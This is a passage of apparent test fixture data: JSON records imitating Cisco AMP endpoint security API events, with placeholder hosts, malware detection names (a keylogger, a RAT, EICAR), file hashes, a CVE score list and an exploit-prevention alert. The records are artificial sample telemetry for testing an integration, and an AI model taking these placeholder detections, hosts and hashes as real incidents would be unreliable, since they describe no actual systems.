lnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat 